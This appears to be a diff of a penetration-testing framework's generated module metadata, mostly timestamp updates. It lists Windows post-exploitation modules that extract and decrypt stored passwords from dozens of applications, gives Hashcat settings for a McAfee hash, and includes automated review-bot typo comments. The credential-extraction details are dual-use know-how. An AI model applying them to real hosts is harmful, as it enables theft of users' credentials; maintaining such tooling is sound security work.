"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/epo_sql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/epo_sql",
@@ -213290,7 +215790,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/filezilla_server.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/filezilla_server",
@@ -213326,7 +215826,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/flashfxp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/flashfxp",
@@ -213410,7 +215910,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/ftpnavigator.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/ftpnavigator",
@@ -213446,7 +215946,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/ftpx.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/ftpx",
@@ -213538,7 +216038,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-09-23 17:41:20 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/gpp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/gpp",
@@ -213564,7 +216064,7 @@
"author": [
"h0ng10"
],
"description": "This module extracts saved passwords from the HeidiSQL client. These\n passwords are stored in the registry. They are encrypted with a custom algorithm.\n This module extracts and decrypts these passwords.",
"description": "This module extracts saved passwords from the HeidiSQL client. These\n passwords are stored in the registry. They are encrypted with a custom algorithm.\n This module extracts and decrypts these passwords.",
"references": [
],
@@ -213574,7 +216074,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/heidisql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/heidisql",
@@ -213649,7 +216149,7 @@
"sil3ntdre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.",
"description": "This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.",
"references": [
],
@@ -213659,7 +216159,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/idm.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/idm",
@@ -213733,7 +216233,7 @@
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect iMail user data such as the username, domain,\n full name, e-mail, and the decoded password. Please note if IMAILUSER is\n specified, the module extracts user data from all the domains found. If\n IMAILDOMAIN is specified, then it will extract all user data under that\n particular category.",
"description": "This module will collect iMail user data such as the username, domain,\n full name, e-mail, and the decoded password. Please note if IMAILUSER is\n specified, the module extracts user data from all the domains found. If\n IMAILDOMAIN is specified, then it will extract all user data under that\n particular category.",
"references": [
"EDB-11331"
],
@@ -213743,7 +216243,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/imail.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/imail",
@@ -213769,7 +216269,7 @@
"author": [
"Shubham Dawra <shubham2dawra@gmail.com>"
],
"description": "This module extracts account username & password from the IMVU game client\n and stores it as loot.",
"description": "This module extracts account username & password from the IMVU game client\n and stores it as loot.",
"references": [
],
@@ -213779,7 +216279,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/imvu.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/imvu",
@@ -214046,7 +216546,7 @@
"Mike Manzotti <mike.manzotti@dionach.com>",
"Maurizio inode Agazzini"
],
"description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n used to lock down the user interface. Hashcat supports cracking this type of\n hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). A dynamic\n format is available for John the Ripper at the referenced URL.",
"description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n used to lock down the user interface. Hashcat supports cracking this type of\n hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). A dynamic\n format is available for John the Ripper at the referenced URL.",
"references": [
"URL-https://www.dionach.com/blog/disabling-mcafee-on-access-scanning"
],
@@ -214056,7 +216556,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mcafee_vse_hashdump",
@@ -214092,7 +216592,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mdaemon_cred_collector",
@@ -214129,7 +216629,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/meebo.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/meebo",
@@ -214250,7 +216750,7 @@
"hdm <x@hdm.io>",
"mubix <mubix@hak5.org>"
],
"description": "This module extracts saved passwords from mRemote. mRemote stores\n connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n the passwords in an encrypted format. The module will extract the connection\n info and decrypt the saved passwords.",
"description": "This module extracts saved passwords from mRemote. mRemote stores\n connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n the passwords in an encrypted format. The module will extract the connection\n info and decrypt the saved passwords.",
"references": [
],
@@ -214260,7 +216760,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/mremote.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mremote",
@@ -214297,7 +216797,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/mssql_local_hashdump",
@@ -214372,7 +216872,7 @@
"sil3ntdre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module extracts the account passwords saved by Nimbuzz Instant\n Messenger in hex format.",
"description": "This module extracts the account passwords saved by Nimbuzz Instant\n Messenger in hex format.",
"references": [
],
@@ -214382,7 +216882,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/nimbuzz.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/nimbuzz",
@@ -214514,7 +217014,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/outlook.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/outlook",
@@ -214601,7 +217101,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/gather/credentials/pulse_secure.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/pulse_secure",
@@ -214609,6 +217109,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter"
@@ -214638,7 +217147,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/purevpn_cred_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/purevpn_cred_collector",
@@ -214725,7 +217234,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/razer_synapse.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/razer_synapse",
@@ -214762,7 +217271,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/razorsql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/razorsql",
@@ -214798,7 +217307,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/rdc_manager_creds",
@@ -214976,7 +217485,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/securecrt.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/securecrt",
@@ -215024,7 +217533,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/skype.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/skype",
@@ -215052,7 +217561,7 @@
"bcoles <bcoles@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module extracts and decrypts the sysadmin password in the\n SmarterMail 'mailConfig.xml' configuration file. The encryption\n key and IV are publicly known.\n\n This module has been tested successfully on SmarterMail versions\n 10.7.4842 and 11.7.5136.",
"description": "This module extracts and decrypts the sysadmin password in the\n SmarterMail 'mailConfig.xml' configuration file. The encryption\n key and IV are publicly known.\n\n This module has been tested successfully on SmarterMail versions\n 10.7.4842 and 11.7.5136.",
"references": [
"URL-http://www.gironsec.com/blog/tag/cracking-smartermail/"
],
@@ -215062,7 +217571,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-19 20:35:33 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/smartermail.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/smartermail",
@@ -215099,7 +217608,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/smartftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/smartftp",
@@ -215183,7 +217692,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/spark_im.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/spark_im",
@@ -215267,7 +217776,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/sso.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/sso",
@@ -215303,7 +217812,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/steam.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/steam",
@@ -215567,7 +218076,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/tortoisesvn.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/tortoisesvn",
@@ -215603,7 +218112,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/total_commander.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/total_commander",
@@ -215640,7 +218149,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/trillian.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/trillian",
@@ -215654,6 +218163,51 @@
],
"needs_cleanup": null
},
"post_windows/gather/credentials/veeam_credential_dump": {
"name": "Veeam Backup and Replication Credentials Dump",
"fullname": "post/windows/gather/credentials/veeam_credential_dump",
"aliases": [
],
"rank": 0,
"disclosure_date": "2022-11-22",
"type": "post",
"author": [
"npm <npm@cesium137.io>"
],
"description": "This module exports and decrypts credentials from Veeam Backup & Replication and\n Veeam ONE Monitor Server to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with either of these products installed. The module\n supports automatic detection of VBR / Veeam ONE and is capable of decrypting\n credentials for all versions including the latest build of 11.x.",
"references": [
"URL-https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-01-18 14:27:28 +0000",
"path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/veeam_credential_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": [
"meterpreter"
],
"needs_cleanup": null
},
"post_windows/gather/credentials/viber": {
"name": "Viber credential gatherer",
"fullname": "post/windows/gather/credentials/viber",
@@ -215725,7 +218279,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/vnc.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/vnc",
@@ -215762,7 +218316,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/windows_autologin.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/windows_autologin",
@@ -215900,7 +218454,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/winscp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/winscp",
@@ -215936,7 +218490,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/credentials/wsftp_client.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/wsftp_client",
@@ -216020,7 +218574,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/gather/credentials/xshell_xftp_password.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/xshell_xftp_password",
@@ -216028,6 +218582,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter"
@@ -216092,7 +218655,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/dumplinks.rb",
"is_install_path": true,
"ref_name": "windows/gather/dumplinks",
@@ -216118,7 +218681,7 @@
"author": [
"Ben Campbell <ben.campbell@mwrinfosecurity.com>"
],
"description": "This module will enumerate BitLocker recovery passwords in the default AD\n directory. This module does require Domain Admin or other delegated privileges.",
"description": "This module will enumerate BitLocker recovery passwords in the default AD\n directory. This module does require Domain Admin or other delegated privileges.",
"references": [
"URL-https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx"
],
@@ -216128,7 +218691,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ad_bitlocker.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_bitlocker",
@@ -216164,7 +218727,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ad_computers.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_computers",
@@ -216200,7 +218763,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ad_groups.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_groups",
@@ -216226,7 +218789,7 @@
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n It cannot at the moment identify whether the 'Manager can update membership list' option\n option set; if so, it would allow that member to update the contents of that group. This\n could either be used as a persistence mechanism (for example, set your user as the 'Domain\n Admins' group manager) or could be used to detect privilege escalation opportunities\n without having domain admin privileges.",
"description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n It cannot at the moment identify whether the 'Manager can update membership list' option\n option set; if so, it would allow that member to update the contents of that group. This\n could either be used as a persistence mechanism (for example, set your user as the 'Domain\n Admins' group manager) or could be used to detect privilege escalation opportunities\n without having domain admin privileges.",
"references": [
],
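Review bot: the description carried through this hunk has a duplicated word and a missing verb: "whether the 'Manager can update membership list' option option set" should read "whether the 'Manager can update membership list' option is set". Since this JSON is generated, the fix belongs in the module's description heredoc; the metadata will pick it up on the next regeneration.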
@@ -216236,7 +218799,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_managedby_groups",
@@ -216263,7 +218826,7 @@
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Scott Sutherland"
],
"description": "This module will enumerate servicePrincipalName in the default AD directory\n where the user is a member of the Domain Admins group.",
"description": "This module will enumerate servicePrincipalName in the default AD directory\n where the user is a member of the Domain Admins group.",
"references": [
"URL-https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap"
],
@@ -216273,7 +218836,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_service_principal_names",
@@ -216299,7 +218862,7 @@
"author": [
"Thomas Ring"
],
"description": "This module will gather information from the default Active Domain (AD) directory\n and use these words to seed a wordlist. By default it enumerates user accounts to\n build the wordlist.",
"description": "This module will gather information from the default Active Domain (AD) directory\n and use these words to seed a wordlist. By default it enumerates user accounts to\n build the wordlist.",
"references": [
],
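Review bot: "default Active Domain (AD) directory" in the enum_ad_to_wordlist description should be "default Active Directory (AD)"; the same phrase appears in the enum_ad_user_comments description a few hunks below. Both strings are unchanged by this diff, so the correction belongs in the two modules' source, not in this generated file.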
@@ -216309,7 +218872,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_to_wordlist",
@@ -216335,7 +218898,7 @@
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n contain 'pass' in their description or comment (case-insensitive) by default. In some cases,\n such users have their passwords specified in these fields.",
"description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n contain 'pass' in their description or comment (case-insensitive) by default. In some cases,\n such users have their passwords specified in these fields.",
"references": [
"URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx"
],
@@ -216345,7 +218908,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ad_user_comments.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_user_comments",
@@ -216383,7 +218946,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ad_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ad_users",
@@ -216419,7 +218982,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-12-11 14:10:48 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_applications.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_applications",
@@ -216549,7 +219112,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_av_excluded.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_av_excluded",
@@ -216634,7 +219197,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-02-18 02:45:09 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_chrome.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_chrome",
@@ -216670,7 +219233,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_computers.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_computers",
@@ -216707,7 +219270,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_db.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_db",
@@ -216733,7 +219296,7 @@
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Enumerate PCI hardware information from the registry. Please note this script\n will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n and 'USB'; it will take time to finish. It is recommended to run this module as a\n background job.",
"description": "Enumerate PCI hardware information from the registry. Please note this script\n will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n and 'USB'; it will take time to finish. It is recommended to run this module as a\n background job.",
"references": [
],
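Review bot: the registry subkey list in the enum_devices description has a misplaced quote, `'LEGACY'', LPTENUM'`, which should be `'LEGACY', 'LPTENUM'`. It is copied unchanged from the old line, so this change does not introduce it, but the description is what `info` shows operators and it is worth correcting in the module source.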
@@ -216743,7 +219306,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_devices.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_devices",
@@ -216781,7 +219344,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_dirperms.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_dirperms",
@@ -216956,7 +219519,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_domain_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain_users",
@@ -216982,7 +219545,7 @@
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module enumerates currently the domains a host can see and the domain\n controllers for that domain.",
"description": "This module enumerates currently the domains a host can see and the domain\n controllers for that domain.",
"references": [
],
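Review bot: "This module enumerates currently the domains a host can see and the domain controllers for that domain" is awkwardly ordered; "This module enumerates the domains a host can currently see and the domain controllers for each" says the same thing clearly. Generated file, so fix it in the module's description.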
@@ -216992,7 +219555,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-01-28 10:25:52 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_domains.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domains",
@@ -217028,7 +219591,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-02-22 18:47:46 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_emet.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_emet",
@@ -217065,7 +219628,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-04-05 11:34:37 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_files.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_files",
@@ -217183,7 +219746,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_ie.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ie",
@@ -217313,7 +219876,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_muicache.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_muicache",
@@ -217349,7 +219912,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-01-29 10:17:48 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/windows/gather/enum_onedrive.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_onedrive",
@@ -217357,6 +219920,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter"
@@ -217479,7 +220051,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/windows/gather/enum_prefetch.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_prefetch",
@@ -217562,7 +220134,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
